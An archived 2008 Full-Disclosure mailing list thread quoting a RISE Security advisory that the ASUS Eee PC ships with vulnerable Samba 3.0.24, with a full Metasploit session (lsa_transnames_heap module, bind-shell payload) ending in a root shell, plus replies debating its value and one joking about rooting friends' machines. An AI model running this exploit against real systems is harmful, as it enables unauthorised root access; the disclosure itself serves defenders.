lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <d8d979980802081315m6f193524y8ffb22ef00de0ff1@mail.gmail.com>
Date: Fri, 8 Feb 2008 16:15:58 -0500
From: "Erik Harrison" <eharrison@...il.com>
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: ASUS Eee PC rooted out of the box

Who cares?

Of all the information posted on this list each and every day, you
choose this to whine about? Is there no value in knowing that this
particular system has a remote-root exploit out of the box?

I find this information more valuable than the thousands of SQL
injection advisories for tiny software apps who have only ever been
downloaded from SF 16 times. Chances are, this is likely more of a
real problem that I'm to encounter in my life.

The claim that this is 'media hyped' is a bit ridiculous. If this were
written for that audience, we probably wouldn't be reading raw process
lists or metasploit output. Though I would certainly enjoy seeing this
republished in some major newspaper tomorrow, if only to
force/embarrass the vendor into patching the default image for these
machines when they're shipped - like they should be doing anyway. Is
there anything wrong with that?

So, thank you for posting this advisory. While technically it's no new
information, not a new exploit, I appreciate knowing that I can visit
my friends homes and root their boxes while they order pizza
wirelessly on their couch.


On Feb 8, 2008 3:29 PM, reepex <reepex@...il.com> wrote:
> yes and no where in here includes 'make some media hyped report & blog crap
> for 5 minutes of fame'
>
>
>
> On Feb 8, 2008 2:27 PM, <keith@...uritynow.us> wrote:
>
> > Security research should go as follows, run some type of scanner to find
> known issues (low hanging fruit). Use your skill to manually try to find
> threats then manually create an exploit then report the issue after
> verified.
> >
> >
> >
> > -----Original Message-----
> > From: reepex <reepex@...il.com>
> > Sent: Friday, February 8, 2008 2:38pm
> > To: RISE Security <advisories@...esecurity.org>,
> full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >
> > Hosted and sponsored by Secunia - http://secunia.com/So you ran metasploit
> and then made a blog post. Is this what 'security
> > research' is considered now? And why did you write this is such a media
> > hyped way? Trying to get some spotlight?
> >
> > On Feb 8, 2008 10:47 AM, RISE Security <advisories@...esecurity.org>
> wrote:
> >
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA1
> > >
> >
> >
> >
> > > We recently acquired an ASUS Eee PC (if you want to know more about it,
> > > a lot of reviews are available on internet). The first thing we did when
> > > we put our hands at the ASUS Eee PC was to test its security. The ASUS
> > > Eee PC comes with a customized version of Xandros operating system
> > > installed, and some other bundled software like Mozilla Firefox, Pidgin,
> > > Skype and OpenOffice.org.
> > >
> > > Analysing the running processes of the ASUS Eee PC, the first thing that
> > > caught our attention was the running smbd process (the sshd daemon was
> > > started by us, and is not enabled by default).
> > >
> > >
> > > eeepc-rise:/root> ps -e
> > >  PID TTY          TIME CMD
> > >    1 ?        00:00:00 fastinit
> > >    2 ?        00:00:00 ksoftirqd/0
> > >    3 ?        00:00:00 events/0
> > >    4 ?        00:00:00 khelper
> > >    5 ?        00:00:00 kthread
> > >   25 ?        00:00:00 kblockd/0
> > >   26 ?        00:00:00 kacpid
> > >  128 ?        00:00:00 ata/0
> > >  129 ?        00:00:00 ata_aux
> > >  130 ?        00:00:00 kseriod
> > >  148 ?        00:00:00 pdflush
> > >  149 ?        00:00:00 pdflush
> > >  150 ?        00:00:00 kswapd0
> > >  151 ?        00:00:00 aio/0
> > >  152 ?        00:00:00 unionfs_siod/0
> > >  778 ?        00:00:00 scsi_eh_0
> > >  779 ?        00:00:00 scsi_eh_1
> > >  799 ?        00:00:00 kpsmoused
> > >  819 ?        00:00:00 kjournald
> > >  855 ?        00:00:00 fastinit
> > >  857 ?        00:00:00 sh
> > >  858 ?        00:00:00 su
> > >  859 tty3     00:00:00 getty
> > >  862 ?        00:00:00 startx
> > >  880 ?        00:00:00 xinit
> > >  881 tty2     00:00:06 Xorg
> > >  890 ?        00:00:00 udevd
> > >  952 ?        00:00:00 ksuspend_usbd
> > >  953 ?        00:00:00 khubd
> > >  1002 ?        00:00:00 acpid
> > >  1027 ?        00:00:00 pciehpd_event
> > >  1055 ?        00:00:00 ifplugd
> > >  1101 ?        00:00:00 scsi_eh_2
> > >  1102 ?        00:00:00 usb-storage
> > >  1151 ?        00:00:00 icewm
> > >  1185 ?        00:00:01 AsusLauncher
> > >  1186 ?        00:00:00 icewmtray
> > >  1188 ?        00:00:01 powermonitor
> > >  1190 ?        00:00:00 minimixer
> > >  1191 ?        00:00:00 networkmonitor
> > >  1192 ?        00:00:00 wapmonitor
> > >  1193 ?        00:00:00 x-session-manag
> > >  1195 ?        00:00:00 x-session-manag
> > >  1200 ?        00:00:00 x-session-manag
> > >  1201 ?        00:00:00 dispwatch
> > >  1217 ?        00:00:00 cupsd
> > >  1224 ?        00:00:00 usbstorageapple
> > >  1234 ?        00:00:00 kondemand/0
> > >  1240 ?        00:00:00 portmap
> > >  1248 ?        00:00:00 keyboardstatus
> > >  1272 ?        00:00:00 memd
> > >  1279 ?        00:00:00 scim-helper-man
> > >  1280 ?        00:00:00 scim-panel-gtk
> > >  1282 ?        00:00:00 scim-launcher
> > >  1297 ?        00:00:00 netserv
> > >  1331 ?        00:00:00 asusosd
> > >  1476 ?        00:00:00 xandrosncs-agen
> > >  1775 ?        00:00:00 dhclient3
> > >  2002 ?        00:00:00 nmbd
> > >  2004 ?        00:00:00 smbd
> > >  2005 ?        00:00:00 smbd
> > >  2322 ?        00:00:00 sshd
> > >  2345 ?        00:00:00 sshd
> > >  2356 pts/0    00:00:00 bash
> > >  2362 pts/0    00:00:00 ps
> > > eeepc-rise:/root>
> > >
> > >
> > > Retrieving the the smbd version, we discovered that it runs a vulnerable
> > > version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> > > we published earlier last year.
> > >
> > >
> > > eeepc-rise:/root> smbd --version
> > > Version 3.0.24
> > > eeepc-rise:/root>
> > >
> > >
> > > With this information, we ran our exploit against the ASUS Eee PC using
> > > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> > > Debian based).
> > >
> > >
> > > msf > use linux/samba/lsa_transnames_heap
> > > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> > > RHOST => 192.168.50.10
> > > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> > > PAYLOAD => linux/x86/shell_bind_tcp
> > > msf exploit(lsa_transnames_heap) > show targets
> > >
> > > Exploit targets:
> > >
> > >   Id  Name
> > >   --  ----
> > >   0   Linux vsyscall
> > >   1   Linux Heap Brute Force (Debian/Ubuntu)
> > >   2   Linux Heap Brute Force (Gentoo)
> > >   3   Linux Heap Brute Force (Mandriva)
> > >   4   Linux Heap Brute Force (RHEL/CentOS)
> > >   5   Linux Heap Brute Force (SUSE)
> > >   6   Linux Heap Brute Force (Slackware)
> > >   7   DEBUG
> > >
> > >
> > > msf exploit(lsa_transnames_heap) > set TARGET 1
> > > TARGET => 1
> > > msf exploit(lsa_transnames_heap) > exploit
> > > [*] Started bind handler
> > > [*] Creating nop sled....
> > > ...
> > > [*] Trying to exploit Samba with address 0x08415000...
> > > [*] Connecting to the SMB service...
> > > [*] Binding to
> > > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > > ...
> > > [*] Bound to
> > > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > > ...
> > > [*] Calling the vulnerable function...
> > > [+] Server did not respond, this is expected
> > > [*] Command shell session 1 opened (192.168.50.201:33694 ->
> > > 192.168.50.10:4444)
> > > msf exploit(lsa_transnames_heap) > sessions -i 1
> > > [*] Starting interaction with 1...
> > >
> > > uname -a
> > > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> > > GNU/Linux
> > > id
> > > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
> > >
> > >
> > > Easy to learn, Easy to work, Easy to root.
> > >
> > >
> > > The original blog post and more information can be found in our
> > > website at http://risesecurity.org/.
> > >
> > > Best regards,
> > > RISE Security
> >
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: GnuPG v1.2.6 (GNU/Linux)
> > >
> >
> > > iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
> > > 6tg6XRBCWHfPWFrSdVKu5oA=
> > > =OFwe
> > > -----END PGP SIGNATURE-----
> > >
> > > _______________________________________________
> >
> >
> >
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists